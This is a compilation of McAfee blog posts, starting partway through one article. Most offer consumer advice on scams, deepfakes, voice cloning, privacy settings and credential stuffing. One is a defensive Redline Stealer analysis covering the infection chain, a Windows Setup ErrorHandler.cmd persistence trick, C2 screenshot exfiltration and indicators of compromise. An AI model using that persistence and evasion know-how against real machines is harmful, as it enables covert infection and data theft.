Online protection software like ours can help you spot fakes and scams. Features like McAfee Scam Protection use advanced AI to detect scam links in texts, email, and social media messages before you click. Our Personal Data Cleanup can keep you safer still by removing your personal info from sketchy data broker sites — places where scammers go to harvest useful info on their victims. And if the unfortunate happens, we offer $2 million in identity theft coverage and identity restoration support.​

Put an End to it 

If you suspect that you’re being scammed, put an end to the relationship and report it, as difficult as that may feel. 

Notify the FTC at ReportFraud.ftc.gov for support and next steps to help you recover financially as much as possible. Likewise, notify the social media site, app, or service where the scam occurred as well. In some cases, you may want to file a police report, which we cover in our broader article on identity theft and fraud.  

If you sent funds via a gift card, the FTC suggests filing a claim with the company as soon as possible. They offer further advice on filing a claim here, along with a list of contact numbers for gift card brands that scammers commonly use.  

Lastly, go easy on yourself. If you find yourself a victim of online dating or romance fraud, know that you won’t be the first or last person to be taken advantage of this way. By reporting your case, you in fact may help others from falling victim too. 

The post How to Spot Dating Scams appeared first on McAfee Blog.

How to Tell If Your Text Message Is Real 

According to reports from the Federal Trade Commission’s Consumer Sentinel database, text message scams swindled $372 million from Americans in 2023 alone. The staggering figure highlights a growing concern for consumers globally, who increasingly interact with brands and service providers via text, email, and even social media. As our reliance on technology continues, it is important for everyone to understand how to spot scam texts amid the real messages they receive.  amid the real messages they receive.

With such frequent communication from brands and organizations, you can be hard-pressed to figure out what is a scam or not. This practical and actionable advice may be able to help you spot the imposters and protect yourself against even the most hard-to-identify scam messages.    

Understand how brands say they’ll contact you  

Most of us probably avoid reading disclaimers and terms of service from brands and organizations. Paying attention to guidelines for how an organization will contact you will help you stay safe from scams. Just take it from entertainment host, Andy Cohen. 

Cohen received an email he thought was from his bank’s fraud department. Later, the scammer texted Cohen claiming to be from the bank, asking for more information. Cohen ended up sending the scammer money because he believed they were a bank representative. These days, many banks and brands have FYIs on their website about how to spot a legitimate text. Like this page from Chase, which goes over what a real Chase text looks like.  

We have a similar disclosure on our site. For example, our customer service teams will never request sensitive information such as social security numbers, PINs, or bank or payment details. As soon as you sign up for a new account, it’s a good idea to check for this sort of disclaimer and familiarize yourself with contact methods and the type of information organizations might request.  

Verify the message’s source 

Scam messages are so successful because scammers make them look real. During the holidays, when shoppers are ready to leap at deals, scam messages can be hard to resist. With an increased volume of scam texts during major shopping seasons, it’s no wonder open rates can be as high as 98%.  

Consumers can protect themselves against realistic-looking scam messages by verifying the source of the message. If an email hits your mobile inbox, click on the sender’s name to expand their full email address. Typical brand emails will have a “do not reply” somewhere in the address or an official “@branddomain.com” email address. Scam email addresses often appear as strings of gibberish.  

If unsure whether a text from a company is real, log into your account directly to see if it reflects the overdue bill or extra store credit that the text message suggests.  

Educate yourself about the latest scam trends 

Knowing about the latest cybersecurity trends is always good practice. Scammers change their tactics constantly. Text scams that were popular one year may be totally out of style the next time you get a scam message.  

Individuals looking for a place to start can check out FTC, FBI, and CISA websites. Those agencies offer valuable insights about fraud trends and recommendations about how people can protect themselves. The Better Business Bureau (BBB) has an interactive scam tracking tool, and AARP provides tips for older Americans who may not be as in tune with the latest tech trends and tools.  

Layer protection with cutting-edge software 

Thankfully, the software designed to protect against scams evolves, as well. Consumers can turn to product suites that offer features like finding and removing personal info from sites that sell it, adjusting social media controls, and even providing alerts about suspicious financial transactions. 

For scam texts, AI is here to help. McAfee Scam Protection uses AI to scan SMS text messages and alert you about unsafe links. Users can delete those messages without opening them, reducing the risk of compromise and removing any question about whether the message is fraudulent or for real.  

Take a proactive approach to prevent text scams  

The $372 million figure is a stark reminder of growing fraud. As we continue into the digital age, the threat of fraudulent communications from scammers looms. To safeguard against bad actors, consumers must be proactive. By paying attention to brand communication guidelines, verifying the source of messages, remaining educated, and using modern privacy and identity products, consumers can avoid scams before they start.  

The post How to Tell If Your Text Message Is Real  appeared first on McAfee Blog.

How to Spot AI Audio Deepfakes at Election Time

We’ve said it several times in our blogs — it’s tough knowing what’s real and what’s fake out there. And that’s absolutely the case with AI audio deepfakes online. 

Bad actors of all stripes have found out just how easy, inexpensive, and downright uncanny AI audio deepfakes can be. With only a few minutes of original audio, seconds even, they can cook up phony audio that sounds like the genuine article — and wreak all kinds of havoc with it. 

A few high-profile cases in point, each politically motivated in an election year where the world will see more than 60 national elections: 

• In January, thousands of U.S. voters in New Hampshire received an AI robocall that impersonated President Joe Biden, urging them not to vote in the primary.  
• In the UK, more than 100 deepfake social media ads impersonated Prime Minister Rishi Sunak on the Meta platform last December.ⁱ  
• Similarly, the 2023 parliamentary elections in Slovakia spawned deepfake audio clips that featured false proposals for rigging votes and raising the price of beer.ⁱⁱ 

Yet deepfakes have targeted more than election candidates. Other public figures have found themselves attacked as well. One example comes from Baltimore County in Maryland, where a high school principal has allegedly fallen victim to a deepfake attack.  

It involves an offensive audio clip that resembles the principal’s voice which was posted on social media, news of which spread rapidly online. The school’s union has since stated that the clip was an AI deepfake, and an investigation is ongoing.ⁱⁱⁱ In the wake of the attack, at least one expert in the field of AI deepfakes said that the clip is likely a deepfake, citing “distinct signs of digital splicing; this may be the result of several individual clips being synthesized separately and then combined.”^iv 

And right there is the issue. It takes expert analysis to clinically detect if an audio clip is an AI deepfake. 

What makes audio deepfakes so hard to spot?  

Audio deepfakes give off far fewer clues, as compared to the relatively easier-to-spot video deepfakes out there. Currently, video deepfakes typically give off several clues, like poorly rendered hands and fingers, off-kilter lighting and reflections, a deadness to the eyes, and poor lip-syncing. Clearly, audio deepfakes don’t suffer any of those issues. That indeed makes them tough to spot. 

The implications of AI audio deepfakes online present themselves rather quickly. In a time where general awareness of AI audio deepfakes lags behind the availability and low cost of deepfake tools, people are more prone to believe an audio clip is real. Until “at home” AI detection tools become available to everyday people, skepticism is called for.  

Just as “seeing isn’t always believing” on the internet, we can “hearing isn’t always believing” on the internet as well. 

How to spot audio deepfakes. 

The people behind these attacks have an aim in mind. Whether it’s to spread disinformation, ruin a person’s reputation, or conduct some manner of scam, audio deepfakes look to do harm. In fact, that intent to harm is one of the signs of an audio deepfake, among several others. 

Listen to what’s actually being said. In many cases, bad actors create AI audio deepfakes designed to build strife, deepen divisions, or push outrageous lies. It’s an age-old tactic. By playing on people’s emotions, they ensure that people will spread the message in the heat of the moment. Is a political candidate asking you not to vote? Is a well-known public figure “caught” uttering malicious speech? Is Taylor Swift offering you free cookware? While not an outright sign of an AI audio deepfake alone, it’s certainly a sign that you should verify the source before drawing any quick conclusions. And certainly before sharing the clip. 

Think of the person speaking. If you’ve heard them speak before, does this sound like them? Specifically, does their pattern of speech ring true or does it pause in places it typically doesn’t … or speak more quickly and slowly than usual? AI audio deepfakes might not always capture these nuances. 

Listen to their language. What kind of words are they saying? Are they using vocabulary and turns of phrase they usually don’t? An AI can duplicate a person’s voice, yet it can’t duplicate their style. A bad actor still must write the “script” for the deepfake, and the phrasing they use might not sound like the target. 

Keep an ear out for edits. Some deepfakes stitch audio together. AI audio tools tend to work better with shorter clips, rather than feeding them one long script. Once again, this can introduce pauses that sound off in some way and ultimately affect the way the target of the deepfake sounds. 

Is the person breathing? Another marker of a possible fake is when the speaker doesn’t appear to breathe. AI tools don’t always account for this natural part of speech. It’s subtle, yet when you know to listen for it, you’ll notice it when a person doesn’t pause for breath. 

Living in a world of AI audio deepfakes. 

It’s upon us. Without alarmism, we should all take note that not everything we see, and now hear, on the internet is true. The advent of easy, inexpensive AI tools has made that a simple fact. 

The challenge that presents us is this — it’s largely up to us as individuals to sniff out a fake. Yet again, it comes down to our personal sense of internet street smarts. That includes a basic understanding of AI deepfake technology, what it’s capable of, and how fraudsters and bad actors put it to use. Plus, a healthy dose of level-headed skepticism. Both now in this election year and moving forward. 

[i] https://www.theguardian.com/technology/2024/jan/12/deepfake-video-adverts-sunak-facebook-alarm-ai-risk-election

[ii] https://www.bloomberg.com/news/articles/2023-09-29/trolls-in-slovakian-election-tap-ai-deepfakes-to-spread-disinfo

[iii] https://www.baltimoresun.com/2024/01/17/pikesville-principal-alleged-recording/

[iv] https://www.scientificamerican.com/article/ai-audio-deepfakes-are-quickly-outpacing-detection/

The post How to Spot AI Audio Deepfakes at Election Time appeared first on McAfee Blog.

How To Teach Your Kids About Deepfakes

Is it real? Is it fake? 

Deepfake technology has certainly made everything far more complicated online. How do you know for sure what’s real? Can you actually trust anything anymore? Recently, a Hong Kong company lost A$40 million in a deepfake scam after an employee transferred money following a video call with a scammer who looked like his boss! Even Oprah and Taylor have been affected by deepfake scammers using them to promote dodgy online schemes. So, how do we get our heads around it, and just as importantly, how do we help our kids understand it? Don’t stress – I got you. Here’s what you need to know. 

What Actually Is Deepfake Technology? 

Deepfake technology is essentially photoshopping on steroids. It’s when artificial intelligence is used to create videos, voice imitations, and images of people doing and saying things they never actually did. The ‘deep’ comes from the type of artificial intelligence that is used – deep learning. Deep learning trains computers to process data and make predictions in the same way the human brain does. 

When it first emerged around 2017, it was clunky and many of us could easily spot a deepfake however it is becoming increasingly sophisticated and convincing. And that’s the problem. It can be used to create great harm and disruption. Not only can it be used by scammers and dodgy operators to have celebrities promote their products, but it can also be used to undertake image abuse, create pornographic material, and manipulate the outcome of elections. 

How Are DeepFakes Made? 

When deepfakes first emerged they were clunky because they used a type of AI model called Generative Adversarial Network (or GAN). This is when specific parts of video footage or pictures are manipulated, quite commonly the mouth. You may remember when Australian mining magnate Andrew Forest was ‘deepfake’ into spruiking for a bogus ‘get rich quick’ scheme. This deepfake used GAN – as they manipulated just his mouth. 

But deepfakes are now even more convincing thanks to the use of a new type of generative AI called a diffusion model. This new technology means a deepfake can be created from scratch without having to even manipulate original content making the deepfake even more realistic.  

Experts and skilled scammers were the only ones who really had access to this technology until 2023 when it became widely available. Now, anyone who has a computer or phone and the right app (widely available) can make a deepfake.  

While it might take a novice scammer just a few minutes to create a deepfake, skilled hackers are able to produce very realistic deepfakes in just a few hours. 

Why Are Deepfakes Made? 

As I mentioned before, deepfakes are generated to either create harm or cause disruption. But a flurry of recent research is showing that creating deepfake pornographic videos is where most scammers are putting their energy. A recent study into deepfakes in 2023 found that deepfake pornography makes up a whopping 98% of all deepfake videos found online. And not surprisingly, 99% of the victims are women. The report also found that it now takes less than 25 minutes and costs nothing to create a 60-second deepfake pornographic video of anyone using just one clear face image! Wow!! 

Apart from pornography, they are often used for election tampering, identity theft, scam attempts and to spread fake news. In summary, nothing is off limits!  

How To Spot A Deepfake 

The ability to spot a deepfake is something we all need, given the potential harm they can cause. Here’s what to look out for: 

• If it’s a video, check the audio matches the video i.e. is the audio synced to the lip movements? Check for unnatural blinking, odd lighting, misplaced shadows, or facial expressions that don’t match the tone of the voice. These might be the ‘older’ style of deepfakes, created using the GAN or ‘face-swap’ model. 
• Deepfake videos and pictures created with the ‘face swap’ model may also look ‘off’ around the area where they have blended the face onto the original forehead. Check for colour and textual differences or perhaps an unusual hairline.   
• The newer diffusion model means deepfakes can be harder to spot however look for asymmetries like unmatching earrings or eyes that are different sizes. They also don’t do hands very well, so check for the right number of fingers and ‘weird’ looking hands. 
• A gut feeling! Even though the technology is becoming very sophisticated, it’s often possible to detect when it doesn’t seem quite right. There could be an awkwardness in body movement, a facial feature that isn’t quite right, an unusual background noise, or even weird looking teeth!! 

How To Protect Yourself 

There are two main ways you could be affected by deepfakes. First, as a victim e.g. being ‘cast’ in a deepfake pornographic video or photo. Secondly, by being influenced by a deepfake video that is designed to create harm e.g. scam, fake news, or even political disinformation. 

But the good news is that protecting yourself from deepfake technology is not dissimilar to protecting yourself from general online threats. Here are my top tips: 

Be Careful What You Share 

The best way to protect yourself from becoming a victim is to avoid sharing anything online at all. I appreciate that this perhaps isn’t totally realistic so instead, be mindful of what and where you share. Always have privacy settings set to the highest level and consider sharing your pics and videos with a select group instead of with all your online followers. Not only does this reduce the chances of your pictures making their way into the hands of deepfake scammers but it also increases the chance of finding the attacker if someone does in fact create a deepfake of you. 

Consider Watermarking Photos 

If you feel like you need to share pics and videos online, perhaps add a digital watermark to them. This will make it much harder for deepfake creators to use your images as it is a more complicated procedure that could possibly be traceable. 

Be Cautiously Suspicious Always 

Teach your kids to never assume that everything they see online is true or real. If you always operate with a sceptical mindset, then there is less of a chance that you will be caught up in a deepfake scam. If you find a video or photo that you aren’t sure about, do a reverse image search. Or check to see if it’s covered by trusted news websites, if it’s a news video. Remember, if what the person in the video is saying or doing is important, the mainstream news media will cover it. You can always fact check what the ‘person’ in the video is claiming as well. 

Use Multi-Factor Authentication 

Adding another layer of security to all your online accounts will make it that much harder for a deepfake creator to access your accounts and use your photos and videos. Multi-factor authentication or 2-factor authentication means you simply add an extra step to your login process. It could be a facial scan, a code sent to your smartphone, or even a code generated on an authenticator app like Google Authenticator. This is a complete no-brainer and probably adds no more than 30 seconds to the logging in process. 

Keep Your Software Updated 

Yes, this can make a huge difference. Software updates commonly include ‘patches’ or fixes for security vulnerabilities. So, if your software is out of date, it’s a little like having a broken window and then wondering why people can still get in! I recommend turning on automatic updates, so you don’t have to think about it. 

Passwords Are Key 

A weak password is also like having a broken window – it’s so much easier for deepfake scammers to access your accounts and your pics and videos. I know it seems like a lot of work but if every one of your online accounts has its own complex and individual password then you have a much greater chance of keeping the deepfake scammers away! 

So, be vigilant, always think critically, and remember you can report deepfake content to your law enforcement agency. In the US, that’s the FBI and in Australia, it is the eSafety Commissioner’s Office.

Stay safe all!

Alex 

The post How To Teach Your Kids About Deepfakes appeared first on McAfee Blog.

Redline Stealer: A Novel Approach

Authored by Mohansundaram M and Neil Tyagi

A new packed variant of the Redline Stealer trojan was observed in the wild, leveraging Lua bytecode to perform malicious behavior.

McAfee telemetry data shows this malware strain is very prevalent, covering North America, South America, Europe, and Asia and reaching Australia.

Infection Chain

 

• GitHub was being abused to host the malware file at Microsoft’s official account in the vcpkg repository https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip

• McAfee Web Advisor blocks access to this malicious download
• Cheat.Lab.2.7.2.zip is a zip file with hash 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
• The zip file contains an MSI installer.

• The MSI installer contains 2 PE files and a purported text file.
  
• Compiler.exe and lua51.dll are binaries from the Lua project. However, they are modified slightly by a threat actor to serve their purpose; they are used here with readme.txt (Which contains the Lua bytecode) to compile and execute at Runtime.
• Lua JIT is a Just-In-Time Compiler (JIT) for the Lua programming language.
  
• The magic number 1B 4C 4A 02 typically corresponds to Lua 5.1 bytecode.
• The above image is readme.txt, which contains the Lua bytecode. This approach provides the advantage of obfuscating malicious stings and avoiding the use of easily recognizable scripts like wscript, JScript, or PowerShell script, thereby enhancing stealth and evasion capabilities for the threat actor.
• Upon execution, the MSI installer displays a user interface.

• During installation, a text message is displayed urging the user to spread the malware by installing it onto a friend’s computer to get the full application version.

• During installation, we can observe that three files are being written to Disk to C:\program Files\Cheat Lab Inc\ Cheat Lab\ path.

• Below, the three files are placed inside the new path.

 

• • Here, we see that compiler.exe is executed by msiexec.exe and takes readme.txt as an argument. Also, the Blue Highlighted part shows lua51.dll being loaded into compiler.exe. Lua51.dll is a supporting DLL for compiler.exe to function, so the threat actor has shipped the DLL along with the two files.
    

• • During installation, msiexec.exe creates a scheduled task to execute compiler.exe with readme.txt as an argument.
  • Apart from the above technique for persistence, this malware uses a 2^nd fallback technique to ensure execution.
  • It copies the three files to another folder in program data with a very long and random path.

• Note that the name compiler.exe has been changed to NzUW.exe.
• Then it drops a file ErrorHandler.cmd at C:\Windows\Setup\Scripts\
• The contents of cmd can be seen here. It executes compiler.exe under the new name of NzUw.exe with the Lua byte code as a parameter.

• Executing ErrorHandler.cmd uses a LolBin in the system32 folder. For that, it creates another scheduled task.

 

• • The above image shows a new task created with Windows Setup, which will launch C:\Windows\system32\oobe\Setup.exe without any argument.
  • Turns out, if you place your payload in c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd, c:\WINDOWS\system32\oobe\Setup.exe will load it whenever an error occurs.
    

 

Source: Add a Custom Script to Windows Setup | Microsoft Learn

• • c:\WINDOWS\system32\oobe\Setup.exe is expecting an argument. When it is not provided, it causes an error, which leads to the execution of ErrorHandler.cmd, which executes compiler.exe, which loads the malicious Lua code.
  • We can confirm this in the below process tree.
    

We can confirm that c:\WINDOWS\system32\oobe\Setup.exe launches cmd.exe with ErrorHandler.cmd script as argument, which runs NzUw.exe(compiler.exe)

• • It then checks the IP from where it is being executed and uses ip-API to achieve that.

 

• • We can see the network packet from api-api.com; this is written as a JSON object to Disk in the inetCache folder.
    

• • We can see procmon logs for the same.
    

• We can see JSON was written to Disk.

C2 Communication and stealer activity

• • Communication with c2 occurs over HTTP.

• • We can see that the server sent the task ID of OTMsOTYs for the infected machine to perform. (in this case, taking screenshots)
    
  • A base64 encoded string is returned.

• • 

• • An HTTP PUT request was sent to the threat actors server with the URL /loader/screen.
  • IP is attributed to the redline family, with many engines marking it as malicious.
    
    

• Further inspection of the packet shows it is a bitmap image file.
• The name of the file is Screen.bmp
• Also, note the unique user agent used in this put request, i.e., Winter

• After Dumping the bitmap image resource from Wireshark to disc and opening it as a .bmp(bitmap image) extension, we see.
• The screenshot was sent to the threat actors’ server.

Analysis of bytecode File

• It is challenging to get the true decomplication of the bytecode file.
• Many open source decompilers were used, giving a slightly different Lua script.
• The script file was not compiling and throwing some errors.

• The script file was sensitized based on errors so that it could be compiled.

• Debugging process

• One table (var_0_19) is populated by passing data values to 2 functions.
• In the console output, we can see base64 encoded values being stored in var_0_19.
• These base64 strings decode to more encoded data and not to plain strings.

• All data in var_0_19 is assigned to var_0_26

• • The same technique is populating 2nd table (var_0_20)
  • It contains the substitution key for encoded data.
    

• • The above pic is a decryption loop. It iterates over var_0_26 element by element and decrypts it.
  • This loop is also very long and contains many junk lines.
  • The loop ends with assigning the decrypted values back to var_0_26.
    
    

 

• • We place the breakpoint on line 1174 and watch the values of var_0_26.
    

• • As we hit the breakpoint multiple times, we see more encoded data decrypted in the watch window.
    

 

• We can see decrypted strings like Tamper Detected! In var_0_26

Loading luajit bytcode:

Before loading the luajit bytecode, a new state is created. Each Lua state maintains its global environment, stack, and set of loaded libraries, providing isolation between different instances of Lua code.

It loads the library using the Lua_openlib function and loads the debug, io, math,ffi, and other supported libraries,

Lua jit bytecode loaded using the luaL_loadfile export function from lua51. It uses the fread function to read the jit bytecode, and then it moves to the allocated memory using the memmove function.

 

The bytecode from the readme. Text is moved randomly, changing the bytecode from one offset to another using the memmove API function. The exact length of 200 bytes from the Jit bytecode is copied using the memmove API function.

It took table values and processed them using the below floating-point arithmetic and xor instruction.

It uses memmove API functions to move the bytes from the source to the destination buffer.

After further analysis, we found that c definition for variable and arguments which will be used in this script.

We have seen some API definitions, and it uses ffi for directly accessing Windows API functions from Lua code, examples of defining API functions,

 

It creates the mutex with the name winter750 using CreateMutexExW.

It Loads the dll at Runtime using the LdrLoaddll function from ntdll.dll. This function is called using luajit ffi.

It retrieves the MachineGuid from the Windows registry using the RegQueryValueEx function by using ffi. Opens the registry key “SOFTWARE\\Microsoft\\Cryptography” using RegOpenKeyExA—queries the value of “MachineGuid” from the opened registry key.

It retrieves the ComputerName from the Windows registry using the GetComputerNameA function using ffi.

It gathers the following information and sends it to the C2 server.

It also sends the following information to the c2 server,

• In this blog, we saw the various techniques threat actors use to infiltrate user systems and exfiltrate their data.

Indicators of Compromise

Cheat.Lab.2.7.2.zip	5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
Cheat.Lab.2.7.2.zip	https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip
lua51.dll	873aa2e88dbc2efa089e6efd1c8a5370e04c9f5749d7631f2912bcb640439997
readme.txt	751f97824cd211ae710655e60a26885cd79974f0f0a5e4e582e3b635492b4cad
compiler.exe	dfbf23697cfd9d35f263af7a455351480920a95bfc642f3254ee8452ce20655a
Redline C2	213[.]248[.]43[.]58
Trojanised Git Repo	hxxps://github.com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip

 

The post Redline Stealer: A Novel Approach appeared first on McAfee Blog.

How to Protect Yourself Against AI Voice Cloning Attacks

Imagine receiving a call from a loved one, only to discover it’s not them but a convincing replica created by voice cloning technology. This scenario might sound like something out of a sci-fi movie, but it became a chilling reality for a Brooklyn couple featured in a New Yorker article who thought their loved ones were being held for ransom. The perpetrators used voice cloning to extort money from the couple as they feared for the lives of the husband’s parents.  

Their experience is a stark reminder of the growing threat of voice cloning attacks and the importance of safeguarding our voices in the digital age. Voice cloning, also known as voice synthesis or voice mimicry, is a technology that allows individuals to replicate someone else’s voice with remarkable accuracy. While initially developed for benign purposes such as voice assistants and entertainment, it has also become a tool for malicious actors seeking to exploit unsuspecting victims. 

As AI tools become more accessible and affordable, the prevalence of deepfake attacks, including voice cloning, is increasing. So, how can you safeguard yourself and your loved ones against voice cloning attacks? Here are some practical steps to take: 

1. Verify Caller Identity: If you receive a call or message that raises suspicion, take steps to verify the caller’s identity. Ask questions that only the real person would know the answer to, such as details about past experiences or shared memories. Contact the person through an alternative means of communication to confirm their identity. 
2. Establish a Unique Safe Word: Create a unique safe word or phrase with your loved ones that only you would know. In the event of a suspicious call or message, use this safe word to verify each other’s identity. Avoid using easily guessable phrases and periodically change the safe word for added security. 
3. Don’t Transfer Money Through Unconventional Methods: Fraudsters often employ tactics that make retrieving your funds difficult. If you’re asked to wire money, use cryptocurrency, or purchase gift cards and disclose the card numbers and PINs, proceed with caution as these are common indicators of a scam. 
4. Use Technology Safeguards: While technology can be used for malicious purposes, it can also help protect against voice cloning attacks. Tools like Project Mockingbird, currently in development at McAfee, aim to detect AI-generated deepfakes, including audio-based clones. Stay informed about advancements in security technology and consider utilizing such tools to bolster your defenses. 
5. Educate Yourself and Others: Knowledge is your best defense against emerging threats. Take the time to educate yourself and those around you about the dangers of voice cloning and other forms of social engineering attacks. Encourage your loved ones to be skeptical of unsolicited calls or messages, especially if they involve urgent requests for money or personal information. 
6. Report Suspicious Activity: If you believe you’ve been targeted by a voice cloning attack, report it to the appropriate authorities immediately. Organizations like the Federal Trade Commission (FTC) and the Internet Crime Complaint Center (IC3) are equipped to investigate and address cybercrimes. 

Voice cloning attacks represent a new frontier in cybercrime. With vigilance and preparedness, it’s possible to mitigate the risks and protect yourself and your loved ones. By staying informed, establishing safeguards, and remaining skeptical of unexpected communications, you can thwart would-be attackers and keep your voice secure in an increasingly digitized world. 

The post How to Protect Yourself Against AI Voice Cloning Attacks appeared first on McAfee Blog.

How Do You Manage Your Social Media Privacy?

‘Ensure your privacy settings are set to the highest level’ – if you’ve been reading my posts for a bit then you’ll know this is one of my top online safety tips. I’m a fan of ensuring that what you (and your kids) share online is limited to only the eyes that you trust. But let’s talk honestly. When was the last time you checked that your privacy settings were nice and tight? And what about your kids? While we all like to think they take our advice, do you think they have? Or it is all a bit complicated? 

‘We Don’t Want To Share Everything with Everybody’ 

Research from McAfee confirms that the majority of us are keen to share our content online but with a tighter circle. In fact, 58% of social media users are keen to share content with only their family, friends, and followers but there’s a problem. Nearly half (46%) do not adjust their privacy settings on their social media platforms which means they’re likely sharing content with the entire internet!

And it’s probably no surprise why this is the case. When was the last time you tried to check your privacy settings? Could you even find them? Well, you are not alone with 55% of survey respondents confessing that they struggled to find the privacy settings on their social media platforms or even understand how they work. 

Enter McAfee’s Social Privacy Manager 

Well, the good news is there is now a much easier way to decide exactly who you want to share with online. Introducing McAfee’s Social Privacy Manager. All you need to do is select your privacy preferences in a few quick clicks and McAfee will then adjust the privacy settings on your chosen social media accounts. Currently, McAfee’s software works with more than 100 platforms including LinkedIn, Google, Instagram, YouTube, and TikTok. It works across Android and iOS devices and on Windows and Mac computers also. The software is part of the McAfee+ suite. 

What Else Can You Do To Ensure Your Privacy Is Protected Online? 

Well, once you’ve got your social media privacy under control – you can relax – but just for a bit. Because there are a few other critical steps you need to take to ensure your online privacy is as protected as possible. Here’s what I recommend: 

1. A Clever Password Strategy 

In my opinion, passwords are one of the most powerful ways of protecting yourself online. If you have a weak and easily guessed password, you may as well not even bother. In an ideal world, every online account needs its own unique, complex password – think at least 12 characters, a combination of numbers, symbols, and both lower and upper case letters. I love using a crazy sentence. Better still, why not use a password manager that will create a password for you that no human could – and it will remember them for you too! A complete no-brainer! 

2. Is Your Software Up To Date? 

Software that is out of date is a little like leaving your windows and doors open and wondering why you might have an intruder. It exposes you to vulnerabilities and weaknesses that scammers can easily exploit. I always recommend setting your software to update automatically so take a little time to ensure yours is configured like this. 

3. Think Critically Always 

I encourage all my family members – both young and old – to always operate with a healthy dose of suspicion when going about their online business. Being mindful that not everything you see online is true is a powerful mindset. Whether it’s a sensational news article, a compelling ‘must have’ shopping deal, or a ‘TikTok’ influencer providing ‘tried and tested’ financial advice – it’s important to take a minute to think before acting. Always fact-check questionable news stories – you can use sites like Snopes. Why not ‘google’ to see if other customers have bad experiences with the shopping site that’s catching your eye? And if that TikTok influencer is really compelling, do some background research. But, if you have any doubts at all – walk away!  

4. Wi-Fi – Think Before You Connect 

Let’s be honest, Wi-Fi can be a godsend when you are travelling. If you don’t have mobile coverage and you need to check in on the kids then a Wi-Fi call is gold. But using public Wi-Fi can also be a risky business. So, use it sparingly and never ever conduct any financial transactions while connected to it – no exceptions! If you are a regular traveller, you might want to consider using a VPN to help you connect securely. A VPN will ensure that anything you send using Wi-Fi will be protected and unavailable to any potential prying eyes! 

Keeping you and your family safe online is no easy feat. It’s time-consuming and let’s be honest sometimes quite overwhelming. If you have 3 kids and a partner and decided to manually update (or supervise them updating) their privacy settings then I reckon you’d be looking at least half a day’s work – plus all the associated negotiation! So, not only will McAfee’s Social Privacy Manager. ensure you and your loved ones have their social media privacy settings set nice and tight, it will also save you hours of work. And that my friends, is a good thing!

The post How Do You Manage Your Social Media Privacy? appeared first on McAfee Blog.

How to Protect Your Streaming Accounts: Lessons from Roku’s Data Leak

In recent news, Roku, a leading streaming platform, reported that over 591,000 user accounts were affected by credential stuffing attacks. This incident underscores the critical importance of safeguarding your online accounts against cyber threats. Here’s what you need to know to protect yourself and your streaming accounts. 

 As a proactive security measure, Roku has reset the passwords for all affected accounts. It is also notifying customers about the data leak and is refunding or reversing charges for those with unauthorized charges made by cybercriminals. 

Understanding Credential Stuffing

Credential stuffing is a type of cyber-attack where hackers use lists of stolen usernames and passwords from other data breaches to gain unauthorized access to user accounts on various platforms. In Roku’s case, hackers exploited this method to compromise over half a million accounts. 

How Does it Happen?

Hackers obtain lists of usernames and passwords from previous data breaches or leaks. These credentials are often available for sale on the dark web. They then use automated tools to input these stolen credentials into multiple websites or services, including streaming platforms like Roku. When the stolen credentials match an existing Roku account, the hackers gain access and can potentially take control of the account. 

The Impact

When cybercriminals gain access to your streaming accounts, they can do more than just watch your favorite shows. They may sell your account credentials on the dark web, use your personal information for identity theft, or even lock you out of your own account. This not only compromises your privacy but also puts your financial information at risk if you have payment methods linked to your streaming accounts. 

How to Protect Yourself

1. Use Strong, Unique Passwords: Avoid using easily guessable passwords like “password123” or common phrases. Instead, use a combination of letters, numbers, and special characters. Additionally, ensure that you use different passwords for each of your accounts to minimize the impact of a potential breach.

2. Enable Two-Factor Authentication (2FA): Two-factor authentication adds an extra layer of security by requiring a secondary form of verification, such as a code sent to your mobile device, in addition to your password. This makes it much harder for hackers to gain unauthorized access to your accounts.

3. Regularly Monitor Your Accounts: Keep an eye on your account activity for any suspicious or unauthorized login attempts. Many streaming platforms offer features that allow you to review recent login activity and devices connected to your account. If you notice any unfamiliar activity, change your password immediately and report the incident to the platform’s support team.

5. Stay Informed About Data Breaches: Subscribe to services that notify you about data breaches and leaks. Identity monitoring services can alert you if your email address or other personal information has been compromised in a breach, allowing you to take proactive measures to protect your accounts.
6. Get Robust Online Protection: McAfee+ which comes with Password Manager and offers robust online security and can help you secure your accounts by generating complex passwords, storing them and auto-filling your info for faster logins across devices. It’s secure and, best of all, you only have to remember a single password.

 

The recent credential-stuffing attack on Roku serves as a stark reminder of the importance of prioritizing online protection in an increasingly digital world. By following best practices such as using strong passwords, enabling two-factor authentication, and staying vigilant about account activity, you can significantly reduce the risk of falling victim to cyber attacks. Protecting your streaming accounts isn’t just about safeguarding your entertainment preferences—it’s about safeguarding your privacy and personal information. Take the necessary steps today with McAfee+ to secure your online accounts and enjoy a safer, more secure streaming experience. 

The post How to Protect Your Streaming Accounts: Lessons from Roku’s Data Leak appeared first on McAfee Blog.

How to Protect Yourself From Social Media Harassment

Some conversations on social media can get … heated. Some can cross the line into harassment. Or worse. 

Harassment on social media has seen an unfortunate rise in recent years. Despite platforms putting in reporting mechanisms, policies, and even using AI to detect and remove harmful speech, people are seeing more and more harassment on social media. 

Yet even as it becomes more prevalent, nothing about it is usually. Or acceptable. No, you can’t prevent social media harassment. Yet you can protect yourself in the face of these attacks. 

Online harassment statistics continue to climb. 

In 2023, research showed that 52% of American adults said they experienced harassment at some point online. That’s up from 40% in 2022. Also in 2023, 33% said they experienced it in the last year, a jump of 10% from 2022.ⁱ 

The same trend follows for teens, where 51% of them said they experienced harassment in the past year, compared to 36% in the year prior.ⁱⁱ 

Earlier research conducted in the U.S. tracked a significant rise in harassment online between 2014 and 2020. This included the doubling or the near doubling of the most severe forms of online harassment.ⁱⁱⁱ 

Our own research in 2022 also noted a rise of another kind — worry about online harassment. Globally, 60% of children said they were more worried that year about social media harassment (cyberbullying) compared to the year prior. Their parents showed yet more concern, with 74% of them more worried that year about their child being harassed than the last.^iv 

The human cost of social media harassment. 

Stats are one thing, yet behind each figure stands a victim. Harassment takes a hard toll on its victims — emotional, financial, and sometimes physical. That becomes clear the moment you look at the forms it can take. 

Social media harassment includes: 

• Flaming — Online arguments that can include personal attacks. 
• Outing — Disclosing someone’s sexual orientation without their consent. 
• Trolling — Intentionally trying to instigate a conflict through antagonistic messages. 
• Doxing — Publishing private or identifying info without someone’s consent.
